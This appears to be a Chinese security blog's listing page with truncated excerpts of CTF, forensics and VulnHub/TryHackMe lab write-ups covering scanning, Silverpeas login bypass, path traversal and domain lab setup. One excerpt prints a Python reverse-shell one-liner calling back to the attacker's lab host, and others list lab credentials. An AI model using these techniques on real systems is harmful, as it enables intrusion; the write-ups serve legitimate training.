Borgeousのblog

首先连接靶机后直接使用fscan扫描 重点看80端口和8080端口，80端口如下所示 8080是一个未授权访问页面 扫了一下路径，发现都会进行跳转，应该是没有权限导致的 接下来我们重点看80端口搭建的有没有漏洞，用gobuster扫描80端口也没有什么有价值的信息 我们只能继续信息收集 在这个/contact路由下我们找到了一个用户名scr1ptkiddy，而且我们可以注意到一个叫Silverpeas的东西，我们google一下，发现是一个cms系统，通过网上搜索，可以发现通过以下方式找到登录框 参考这个链接进行身份验证绕过，因为我们已经有一个用户名了，所以我们可以尝试无密码登陆 https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d 删除密码字段后成功登陆 接下来进行一波信息收集 我们发现还存在其他两个用户，我们一样的去尝试登陆这两个用户即可 AdministrateurManager 成功登陆Manager账号，发现ssh登陆凭证 timcm0nt!md0ntf0rg3tt ...

信息收集扫描网卡网段，确定靶机IP地址，使用arp-scan -l 可以知道靶机IP是192.168.20.131，接下来用fscan扫描开放端口 只扫出来了22端口，换nmap扫，指令nmap -O -sV -p- -A 192.168.20.131 扫出来了5000端口，而且是http服务，用python搭的，我们直接网页访问即可 是一个留言系统，针对这种带输入框的，要么打xss，要么打命令执行rce，再不济就是ssti，我们挨个试就完了 发现啥都不行，抓包也没发现其他东西，我们这时候扫一下存不存在后门路径 发现存在admin路由，我们尝试访问一下，看看能发现什么 存在命令执行，我们直接反弹shell即可 反弹shell在命令执行框中输入反弹shell代码，经过测试，只有下面这种可以成功反弹shell import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.20.143",9001));os.dup2(s. ...

题目附件下载链接：链接: https://pan.baidu.com/s/1A7dLXIjoG6co7l-Ke4lyqw?pwd=vw54 提取码: vw54 题目解压密码：KzXGabLkDjs&j@3a&fAayNmD 签到题目描述：本题作为签到题,请给出邮服发件顺序。 Received: from mail.da4s8gag.com ([140.143.207.229])by newxmmxszc6-1.qq.com (NewMX) with SMTP id 6010A8ADfor ; Thu, 17 Oct 2024 11:24:01 +0800X-QQ-mid: xmmxszc6-1t1729135441tm9qrjq3kX-QQ-XMRINFO: NgToQqU5s31XQ+vYT/V7+uk=Authentication-Results: mx.qq.com; spf=none smtp.mailfrom=;dkim=none; dmarc=none(permerror) header.from=solar.secReceived: from mail ...

检材一背景2021年4月25日，上午8点左右，警方接到被害人金某报案，声称自己被敲诈数万元；经询问，昨日金某被嫌疑人诱导裸聊，下载了某“裸聊”软件，导致自己的通讯录和裸聊视频被嫌疑人获取，对其进行敲诈，最终金某不堪重负，选择了报警；警方从金某提供的本人手机中，定向采集到了该“裸聊”软件的安装包—zhibo.apk（检材一），请各位回答下列问题：（题目 中需要通过分析出来的答案对检材二三四五解压，解压密码为IP的情况，需要在密码后增加-CAB2021，例192.168.110.110-CAB2021） 这里我们首先使用VeraCrypt挂载我们的检材一和二，如下所示 输入密码2021第三届CAB-changancup.com，即可挂载成功 请计算检材一Apk的SHA256值直接用cmd计算sha256即可，如下所示 3fece1e93be4f422c8446b77b6863eb6a39f19d8fa71ff0250aac10f8bdde73a 该APK的应用包名为直接启动安卓模拟器拖进去安装，如下所示 成功找到apk的名字，但是我们提交发现不对，我们这里采取对其逆向的方式看看有没有 ...

背景材料您的同事李白在运维一台部署了移动应用服务端的linux服务器时发现了异常，好像被黑客攻击了。小李通过简单分析，发现可能是由于公司的移动应用和其服务端程序都存在安全问题导致的。小李将当天可能与攻击相关的流量导出，并与移动应用一起打包压缩，你可以下载分析，也可以登录此服务器进行攻击溯源、排查等，提供了SSH和VNC访问的方式供您和您的团队进行分析取证。 关卡一黑客攻击此服务器所使用的2个IP分别是什么（ascii码从小到大排列，空格分隔） 很容易可以在流量包中找到两个恶意ip，一个进行了sql注入，一个进行恶意命令执行 关卡二存在安全问题的apk中使用的登录密码是什么? 我们这里采用jadx对apk进行逆向，然后在源文件中找到登陆密码 这里的密码很容易就能看出是password663399，当然也可以去流量包中找登陆操作，也是一样的 关卡三黑客尝试上传一个文件但显示无上传权限的文件名是什么？ 我们回到我们的流量包，找上传相关事件，直接搜索POST数据包，并且搜索upload关键词，然后通过查找返回状态码为200的数据包 关卡四黑客利用的漏洞接口的api地址是什么?（http ...

WEB速算比赛先简单使用yakit抓包，发现只要不对/进行get操作，题目就不会改变，但是一旦使用post/get方法请求/，就会修改题目，因此需要使用脚本自动解析题目并提交答案。代码如下： import reimport requestsfrom bs4 import BeautifulSouphtml_contents = []url = 'http://139.155.126.78:15979/'headers = { 'Host': '139.155.126.78:15979', 'Upgrade-Insecure-Requests': '1', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Referer': 'http://139.155.126.78:15979/ ...

Webhello_web查看页面源码，如下所示 发现两个提示的php文件，我们尝试访问hackme.php 发现不是这样利用的，tips.php也读不到，我们尝试换一种路径穿越的读法，经过搜索可以知道我们可以用.和/进行组合进行路径穿越，最后在fuzz测试下，我们发现….//组合可以读到文件源码，如下所示 利用相同的方式，我们可以去读tips.php，如下所示 是一个phpinfo文件，我们可以看到禁用了一些函数，但是可以先不管，我们去分析一下这个hackme.php，如下所示 <?phphighlight_file(__FILE__);$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71% ...

题目背景“By the time you read this, you’ve already been attacked. I’m in your machine and you won’t get it back. You must be aware that the more you delay, the more information will be stolen away. Your SOC is so weak, I’ll lend them a hand. Here’s a PCAP of the attack, you can’t beat this band! If your machine you want to recover, the password I stole you’ll need to discover.” The first of our enemies is the Frostbite Fox. Known for being the slyest of them all. She’s made her way into McSkidy’s ma ...

MISCSign签到题，我们打开外部链接，可以看到下面的一串字符 显然是十六进制，我们找一个在线的十六进制转字符串进行解码就可以拿下简单的签到题了 原神启动我们把附件下载下来，解压后如下所示 我们首先用steg对原神启动.png进行分析，如下所示 我们发现第一个密码WuCup{7c16e21c-31c2-439e-a814-bba2ca54101a}，我们拿去解密zip压缩包，得到一个docx文件，但是我们打开来什么都没有，这显然就是在考docx的隐写，我们将后缀改成zip解压即可 接下来在word/media中发现另外一张图片，同样用steg进行处理，得到第二个密钥 WuCup{6bb9d97d-7169-434b-a7cf-0ee0b6fdfa30} 解压文件夹后，我们得到一个text.zip文件 仍然需要密码，我们再去寻找最后一个密码，我们在document.xml中发现了端倪，所以这就是我们最后的密码 WuCup{f848566c-3fb6-4bfd-805a-d9e102511784} 我们解密最后的 ...

环境搭建这个靶场相对于前几个靶场来说较为简单，只有两台靶机，其中一台主机是win7，作为我们的DMZ区域的入口机，另外一台是windows2008，作为我们的域控主机，所以我们只需要给我们的win7配置两张网卡，给我们的Windows2008配置一张网卡即可，如下所示 我们的IP地址如下所示 机器名称 内网IP 外网IP 攻击机（kali） 192.168.20.143 win7 192.168.138.136 192.168.20.146 Windows2008（DC） 192.168.138.138 我们的各机器账号密码如下所示 win7sun\heart 123.comsun\Administrator dc123.comwindows2008sun\admin 2020.com 记得进入win7打开phpstudy开启web服务 外网环境探测首先我们使用nmap和fscan进行全网段扫描，如下所示 我们发现这里的web服务是thinkphp5.x版本，且fscan帮我们检测出来了存在rce漏洞，我们直接利用thinkphp利用工具进行r ...

环境搭建我们这里会拿到三台主机，一台web主机，一台win7主机，一台DC主机 机器密码WEB主机 ubuntu:ubuntu WIN7主机 douser:Dotest123 (DC)WIN2008主机 administrator:Test2008 登陆后需修改密码，我这里修改为1qaz@WSX 网络配置首先我们先将我们的VMnet2网卡网段改成192.168.183.0，如下所示 WEB主机配置由于处于DMZ区域，所以我们这里给WEB机配置两张网卡，如下所示 WIN7主机配置WIN7主机只需配置一张内网网卡即可 DC主机配置DC主机也只需配置一张内网网卡即可 所以我们这里可以总结为下表 名称 内网IP 外网IP 攻击机 192.168.20.143 WEB 192.168.183.7 192.168.20.145 WIN7 192.168.183.6 DC 192.168.183.130 开启web服务我们在web服务器上启动docker服务，执行以下命令 sudo docker start ec 17 09 bb da 3d a ...

环境搭建我们下载后会拿到5个靶机，一个搭在centos上的web机，一个搭在Ubuntu上的web机，一台个人pc机，，一台win2008以及一台Windows server 2012，如下所示 网络拓扑图如下所示，其中IP不一定是真实IP，仅供参考 注意，靶机解压后千万别启动后千万别再关机，因为这个靶机的初始状态就是挂起的状态，然后有些机子我们是已登录的，我们这次的渗透测试的机子都是不知道密码的，属于一个黑盒测试，如果我们关机就失去一些机子的登录状态了 当然，可能大家在搭建环境的时候会和我有一样的疑问，如果不能关机怎么调整虚拟机的网卡配置，这困扰了我一晚上，在我几乎绝望的时候，找到了可以不关机调整网卡的地方，如下所示 更改自己的网卡即可 web-centosweb-centos具有两张网卡，一张网卡NAT模式，另外一张网卡仅主机模式，网段设置为192.168.93.0 我们进入后执行service network restart，重新为我们的虚拟机分配一个外网IP，我们的web-centosIP设置信息如下 192.168.93.100 内网IP192.168.20.142 ...

环境搭建三台机器的密码：1qaz@WSX 域账号密码：administrator:1qaz@WSX 和红日靶场-1实验环境配置一致，我们首先将我们的VMnet1的网卡改成10.10.10.0网段，如下所示 即我们的内网网段是10.10.10.0，外网机器，即我们的DMZ区域我们配置VMnet8网卡，以保证能和我们的主机进行通信，即连接到我们的外网 web服务器我们的web服务器网络配置如下图所示 我们为其配置两张网卡以保障其作为DMZ区域机的功能，同时我们登录进去，将IP外网网段修改为192.168.20.0，因为计算机默认是192.168.111.0，如下所示 我们尝试ping内外网两台主机，如果可以ping通，则代表我们的网卡配置正确，如果ping不通，则我们还需要再设置，如下所示 我们可以ping通，接下来我们开启web服务器上的web服务即可，我们首先进入如下目录C:\Oracle\Middleware\user_projects\domains\base_domain\bin，如下所示 之后我们分别右键，以管理员权限执行setDomainENV、startManag ...

域基础知识工作组和域工作组是局域网中的一个概念，是最常见的资源管理模式，默认情况下计算机都是采用工作组方式进行资源管理，将不同的电脑按功能分别列入不同的工作组中，以方便管理。默认情况下所有的计算机都处于名为WORKGROUP的工作组中，工作组的模式适用于网络中计算机不多，适用于对管理要求不严格的情况 域（Domain）的概念产生于计算机较多的情况下，为了集中管理计算机而推出的一种方式，用来描述一种架构，和“工作组”相对应，但是比工作组更为高级，域是一个有安全边界的计算机集合（安全边界的意思就是在两个域中，一个域的用户无法访问另一个域的资源），域相比工作组而言，有一个更加严格的安全管理控制机制，如果想访问域内资源，就必须以合法的身份登陆到该域中，你对该域内的资源拥有什么样的权限，取决于你在该域中的用户身份 域渗透思路通过域成员主机，定位出域控制器IP及域管理员账号，利用域成员主机作为跳板，扩大渗透范围，利用域管理员可以登录域中任何成员主机的特性，定位出域管理员登陆过的主机IP，设法从域成员主机内存中dump出域管理员密码，进而拿下域控，控制整个内网。 理论基础：由于在规模比较大的域中，域 ...

基本信息由于tryhackme是在线靶场，所以这里的IP均为对方的内网IP 攻击机器：10.10.242.186 靶机：10.10.173.3 目标：获取2个flag+root权限 具体流程信息收集首先我们使用fscan进行端口扫描，fscan -h 10.10.173.3 这里开放了80端口，我们直接访问80端口即可，如下所示 首先我们使用gobuster扫一下后门路径，使用如下命令 gobuster -u http://10.10.173.3:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir 我们访问r路径，如下所示 叫我们继续往前，keepgoing，说明我们的大体方向是对的，现在我们还需要去看看其他地方有没有信息，我们的首页还给我们提供了一张图片，我们可以去看看这张图片是否存在图片隐写的问题 steghide探寻隐藏信息我们将这张图片下载下来 wget http://10.10.173.3/img/white_rabbit_1.jpg 我们使用steghide进行隐藏信息提取 ...

红日靶场涉及内网知识，和前期靶场不太一样，前期靶场大部分都是单个靶机获得root权限，而这一次更综合，后期也会继续学习内网知识，继续打红日靶场，提高自己的综合技能。 环境搭建首先本题的网络拓扑结构如下所示，三台虚拟机的初始密码都是hongrisec@2019 这里我们的Web服务器是win7虚拟机，其他两台虚拟机是域内成员，一台作为我们的DC，首先介绍一下什么是工作组和域。 工作组：将不同计算机按功能分别列入不同的组内，在一个大的单位内，可能有成百上千台电脑互相连接组成局域网，它们都会列在“网络（网上邻居）”内，如果这些电脑不分组，可想而知有多么混乱，要找一台电脑很困难。为了解决这一问题，就有了“工作组”这个概念，将不同的电脑一般按功能（或部门）分别列入不同的工作组中，如技术部的电脑都列入“技术部”工作组中，行政部的电脑都列入“行政部”工作组中。你要访问某个部门的资源，就在“网络”里找到那个部门的工作组名，双击就可以看到那个部门的所有电脑了。相比不分组的情况就有序的多了，尤其是对于大型局域网络来说。域：域是一个有安全边界的计算机集合（安全边界的意思即一个域中的用户无法访问另外一个域中 ...

基本信息靶机下载：https://download.vulnhub.com/darkhole/darkhole_2.zip 攻击机器：192.168.20.128（Windows操作系统）& 192.168.20.138（kali） 难度：困难 提示信息：Don’t waste your time For Brute-Force 靶机：192.168.20.0/24 目标：获取2个flag+root权限 具体流程信息收集老样子首先使用arp-scan -l对主机进行探活，发现主机IP为192.168.20.154 之后对开放的端口进行扫描，执行nmap -O -sV -p- -A 192.168.20.154，结果如下所示 开放了80端口和22端口，我们还是老样子先对80端口进行信息收集 我们在使用nmap的时候，帮我们探测出来了该网站存在git泄露，我们使用githacker获取网站源码，如下图所示 githacker --url http://192.168.20.154/.git/ --output-folder darkhole 我们成功获取部分源码，当我们在查 ...

基本信息靶机下载：https://download.vulnhub.com/dc/DC-2.zip 攻击机器：192.168.20.128（Windows操作系统）& 192.168.20.138（kali） 靶机：192.168.20.0/24 目标：获取5个flag+root权限 具体流程信息收集老样子首先使用arp-scan -l对主机进行探活，发现主机IP为192.168.20.153 之后对开放的端口进行扫描，执行nmap -O -sV -p- -A 192.168.20.153，结果如下所示 开放了80端口和7744端口，其中7744端口对应的是ssh服务，我们首先访问80端口http服务 我们成功发现第一个flag Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.More passwords is always better, but sometimes you just can’t win them all.Log in as one ...

基本信息靶机下载：https://download.vulnhub.com/dc/DC-1.zip 攻击机器：192.168.20.128（Windows操作系统）& 192.168.20.138（kali） 靶机：192.168.20.0/24 目标：获取5个flag+root权限 具体流程信息收集老样子首先使用arp-scan -l对主机进行探活，发现主机IP为192.168.20.152 之后对开放的端口进行扫描，执行nmap -O -sV -p- -A 192.168.20.152，结果如下所示 我们发现开放了22、80、111、42289端口，我们暂时先去看看80端口给我们提供了什么有效的信息 我们发现其存在robots.txt，我们访问robots.txt，看看有没有什么关键信息，探寻了一圈后并没有发现什么有价值的信息，虽然那些文件都可以被访问到，但是并没有什么鸟用，然后我去网上搜了一下Drupal框架的历史漏洞，有一个CVE-2018-7600远程代码执行漏洞和CVE-2019-6340远程代码执行漏洞，但是网上的POC都没有什么用，如下所示 这个时候我们 ...

基本信息靶机下载：https://download.vulnhub.com/noob/Noob.ova 攻击机器：192.168.20.128（Windows操作系统）& 192.168.20.138（kali） 靶机：192.168.20.0/24 目标：获取2个flag+root权限 具体流程信息收集老样子首先使用arp-scan -l对主机进行探活，发现主机IP为192.168.20.151 之后对开放的端口进行扫描，执行nmap -O -sV -p- -A 192.168.20.151，结果如下所示 这里开放了21、80、55077端口，其中21端口提供ftp服务，55077端口提供ssh服务，我们首先访问80端口，如下所示 查看了一下源码，并未发现什么有价值的信息，我们首先扫描一下是否存在后门路径 并未发现什么有价值的信息，我们尝试从ftp服务入手，看看能否获得有价值的信息，在这里我们选择匿名账户登录，21端口运行我们以匿名账户的形式登录 登录进去后我们可以发现有两个提示性文件，cred.txt和welcome 我们传输到我们的本机上来，看看这两个文件是什 ...